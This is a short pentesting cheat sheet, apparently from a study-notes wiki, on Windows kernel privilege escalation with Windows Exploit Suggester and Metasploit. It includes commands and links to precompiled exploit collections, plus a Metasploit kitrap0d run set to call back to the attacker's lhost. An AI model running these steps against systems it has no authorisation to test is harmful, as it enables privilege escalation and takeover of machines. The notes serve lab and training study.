Kernel Exploits

Overview

The Kernel is essentially a computer program that controls everything in the system. It facilitates the interactions between hardware and software components. If we exploit the Kernel (system/core) we become the Kernel >:)

Kernel Version Example

OS Version:    6.1.7600 N/A Build 7600

Kernel Exploits via Windows Exploit Suggester

Pull System Information from machine

systeminfo

Stick into a sysinfo.txt file then update and feed it to Windows Exploit Suggester

python2.7 windows-exploit-suggester.py -u

python2.7 windows-exploit-suggester.py -i sysinfo.txt -d 2024-03-02-mssb.xls

Search for the exploits after receiving the results

GitHub - SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合GitHub

GitHub - abatchy17/WindowsExploits: Windows exploits, mostly precompiled. Not being updated. Check https://github.com/SecWiki/windows-kernel-exploits instead.GitHub

Kernel Exploits via Metasploit

Inside of an existing meterpreter shell

run post/multi/recon/local_exploit_suggester

Choose an exploit based on the ones listed

background
exploit/windows/local/ms10_015_kitrap0d
set session 1 
set lhost tun0
set lport 5555 		(something different from last session)
exploit

PreviousMethodology > Tools NextDLL Hijacking